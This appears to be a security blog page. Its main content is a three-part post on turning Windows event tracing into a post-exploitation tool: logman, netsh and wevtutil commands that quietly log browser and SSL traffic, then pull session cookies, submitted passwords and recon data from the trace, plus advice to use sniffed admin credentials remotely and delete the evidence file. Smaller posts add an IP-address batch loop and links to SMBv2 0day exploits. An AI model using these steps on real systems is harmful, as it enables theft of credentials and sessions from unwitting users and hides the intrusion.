Data Mining Event Tracing for Windows 3

This is continue from the previous 2 posts.

The netsh utility has an interface to enable/disable event tracing for all providers that participate in a given "Scenario". You can tell it you want to use "All" scenarios which enables logging for a large number of providers at the same time.

To start/stop the trace session:

C:\temp>netsh trace start scenario=all tracefile=FIREEVERYTHING2.etl capture=yes correlation=yes
Trace configuration:-------------------------------------------------------------------Status:             RunningTrace File:         FIREEVERYTHING2.etlAppend:             OffCircular:           OnMax Size:           250 MBReport:             Off

C:\temp>netsh trace stopCorrelating traces ... doneGenerating data collection ... doneThe trace file and additional troubleshooting information have been compiled as "C:\temp\FIREEVERYTHING2.cab".File location = C:\temp\FIREEVERYTHING2.etlTracing session was successfully stopped.

The netsh utility correlates "like events" and generates several log file and reports containing some interesting data.

As expected we have our "FIREEVERYTHING2.etl" file that we can query with wevtutil.exe. This file will have the information recorded from by multiple providers and has all kinds of interesting data in it. But there is also a .CAB file that is worth checking out.

To check on human readable content:

C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True /f:Text | more

Here is an example of searching for the "passwd" field in a gmail.com POST with and without the /f:Text option. With /f:Text it finds zero occurrence, but without it finds two.

C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True /f:Text | find /c /i "passwd"0C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True | find /c /i "passwd"2

These logs are not just recording actions taken by built in programs like Internet Explorer. Any third party tools that rely on the ETW enabled APIs will also have their information recorded. So fire up the logging and go on a little treasure hunt!

Data Mining Event Tracing for Windows 2

This is continue from the previous post.

The logman utility can allow us to peer into and established SSL session and steal active session cookies after you have shell on a box.

If you do able to sniff the administrator credential, then you can evenenable logging on a remote host using "logman -s <computername>".

The Microsoft-Window-WinInet is only 1 of the providers that you can turn on the logging. To check the full list of providers in your computer, you can:
c:\temp>logman query providers > listofproviders.txt

C:\temp>type listofproviders.txt | find /c "{"
643


This means there are total of 643 providers available in my computer.

Data Mining Event Tracing for Windows

>>>> From http://pauldotcom.com/wiki/index.php/Episode300

This is to show how to tap into the data logged by Windows Communication Foundation (WCF) and fed to Event Tracing for Windows (ETW).

The ETW Provider logs excesive amounts of information that may give an attacker access to sensitive data. By tapping into these otherwise silent logging mechnisms an attacker can find all kinds of useful information.

Below is an example to show "Sidejacking SSL Cookies". You can steal the cookies within the encrypted SSL session.

First, turn on the Event Tracing for WinInet.

c:\>cd \tempc:\temp>logman start CookieStealer -p Microsoft-Windows-WinInet -o cookiesteal.etl -ets

From now on, all the WinInet connections and SSL sessions are logged.

To check the cookies:

c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "cookie added"

To check the POST info (including password):

c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "POST"

To check some additional reconnaissance:

c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "hostname"c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "WPAD"c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "DNS Cache"

To turn off your Event logging:

c:\temp>logman stop CookieStealer -ets

And remember to remove your "cookiesteal.etl" file.

Multiple IP Addresses with Windows OS

Here's the batch script to help configure multiple IPv4 addresses on a Windows 7 or Windows 2008. Create a batch file like the below:

netsh in ip add address "eth0" 10.0.0.2 255.0.0.0
netsh in ip add address "eth0" 10.0.0.3 255.0.0.0
netsh in ip add address "eth0" 10.0.0.4 255.0.0.0
netsh in ip add address "eth0" 10.0.0.5 255.0.0.0
netsh in ip add address "eth0" 10.0.0.6 255.0.0.0
[...]
netsh in ip add address "eth0" 10.0.0.226 255.0.0.0

Or just do a command like:

for  /L %a in (1,1,254) do netsh in ip add address "eth0" 10.0.0.%a 255.255.255.0

Windows Security Event ID

A very good reference for Windows Security Event ID: http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/Default.aspx

What You May Not Know about the SMB2 0Day

What you may already heard/known today about the SMBv2 0day:

• Remote code execution is released.
• The workaround from Microsoft.
• Why only Windows Vista, 2003, 2008 are vulnerable (including Window 7 RC), but not XP/2000.

Here's a list of follow up that you may not know yet:

• More than 10 version of the exploit is available here (C, PERL, Python, Ruby, win32)
• Port of the BSOD code to Metasploit (instead of RCE).
• Winsock edition is here.
• SMBv2 vulnerability scanner (class B, C) in Python.

In additional, rumor says:

• Could be the same old vulnerability back in 2007.
• Why Windows 7 RTM is not vulnerable:

"We found this issue independently through our fuzzing processes and implemented the fix into Windows 7 RTM (release to manufacturer) and Windows Server 2008 R2," the spokesperson says. "We're working to develop a security update for Windows Vista, Windows Server 2008 and Windows 7 RC."